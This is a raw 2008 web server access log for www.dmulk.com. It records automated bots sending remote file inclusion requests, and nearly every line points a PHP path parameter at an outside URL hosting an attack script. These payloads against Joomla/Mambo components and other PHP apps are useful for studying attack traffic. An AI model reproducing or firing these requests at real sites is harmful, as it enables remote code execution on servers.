74.55.52.194 - - [19/Jul/2008:11:49:40 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.65.34.76 - - [19/Jul/2008:11:50:19 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://totalhardware.co.uk/mambots/.inuse/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.8.9 - - [19/Jul/2008:11:50:35 -0700] "GET /logs/access_080313.log/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.8.9 - - [19/Jul/2008:11:50:36 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.201.8.9 - - [19/Jul/2008:11:50:36 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:50:44 -0700] "GET /logs/access_080225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:50:45 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:50:45 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [19/Jul/2008:11:50:55 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [19/Jul/2008:11:50:55 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:50:58 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:50:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18443 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:50:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:51:02 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:51:04 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18479 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:51:05 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.201.8.9 - - [19/Jul/2008:11:51:22 -0700] "GET /logs/access_080207.log/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:51:53 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.84 - - [19/Jul/2008:11:52:01 -0700] "GET /logs/access_080318.log/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.almacenes-si2.com/portal/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.52.11 - - [19/Jul/2008:11:52:02 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.52.11 - - [19/Jul/2008:11:52:02 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.52.11 - - [19/Jul/2008:11:52:04 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.128.52.11 - - [19/Jul/2008:11:52:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://ownz-you.com/kiddies/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:52:16 -0700] "GET /logs/access_080513.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.71 - - [19/Jul/2008:11:52:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18397 "-" "libwww-perl/5.803" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:11:52:58 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.97.132.101 - - [19/Jul/2008:11:53:03 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/Jul/2008:11:53:04 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 200 18435 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [19/Jul/2008:11:53:07 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/help01.txt????? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:53:11 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:53:18 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:11:53:18 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.109.80.8 - - [19/Jul/2008:11:53:19 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:11:53:21 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [19/Jul/2008:11:53:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:53:21 -0700] "GET /logs/access_080329.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mojir.com/el/moodledata/site/read?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:53:22 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:11:53:23 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 18543 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:11:53:23 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:53:30 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:53:30 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:11:53:34 -0700] "GET /%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.244.11.20 - - [19/Jul/2008:11:53:34 -0700] "GET /logs/%3Cbug%3Ehttp://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.18.246 - - [19/Jul/2008:11:53:41 -0700] "GET /logs/access_071120.log HTTP/1.0" 200 34560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:11:53:44 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:11:53:44 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:11:53:45 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:53:49 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:53:49 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:53:51 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:11:53:51 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.193.201.65 - - [19/Jul/2008:11:53:58 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.193.201.65 - - [19/Jul/2008:11:53:58 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.198.175.18 - - [19/Jul/2008:11:54:20 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.grousetyee.com/jupload/README? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:54:28 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:11:54:28 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:54:31 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:54:32 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:54:32 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:54:33 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18497 "-" "libwww-perl/5.79" "www.dmulk.com"
59.151.2.149 - - [19/Jul/2008:11:54:37 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:54:41 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:54:41 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:21 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:55:21 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:21 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:55:21 -0700] "GET /classes/core/language.php?rootdir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:21 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:55:21 -0700] "GET /logs/classes/core/language.php?rootdir=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:32 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:39 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:39 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:43 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:55:43 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:55:46 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:55:46 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:11:55:47 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:11:55:49 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 200 18543 "-" "libwww-perl/5.810" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:55:50 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:11:55:57 -0700] "GET /logs/access_080313.log/?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:11:55:59 -0700] "GET /?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 200 18413 "-" "libwww-perl/5.65" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:11:55:59 -0700] "GET /logs/?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 200 56851 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:56:07 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:56:12 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:56:12 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:11:56:23 -0700] "GET /logs/access.log//trans/trans.php?trans=fr&page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:11:56:23 -0700] "GET /logs//trans/trans.php?trans=fr&page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:11:56:23 -0700] "GET //trans/trans.php?trans=fr&page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:11:56:59 -0700] "GET /logs/index.php?configFile=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:11:56:59 -0700] "GET /logs/index.php?configFile=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:56:59 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:56:59 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:57:01 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 200 18419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:11:57:01 -0700] "GET /index.php?configFile=http://www.apnic.net/index.html? HTTP/1.0" 200 18375 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:11:57:01 -0700] "GET /index.php?configFile=http://www.apnic.net/index.html? HTTP/1.0" 200 18375 "-" "Mozilla/5.0" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:09 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:10 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:10 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.193.201.65 - - [19/Jul/2008:11:57:13 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:32 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:32 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:57:34 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.151 - - [19/Jul/2008:11:57:48 -0700] "GET /logs/access_080315.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [19/Jul/2008:11:57:48 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [19/Jul/2008:11:57:48 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:58:26 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:58:26 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:11:58:29 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:48 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:48 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:49 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:51 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:52 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:58:52 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
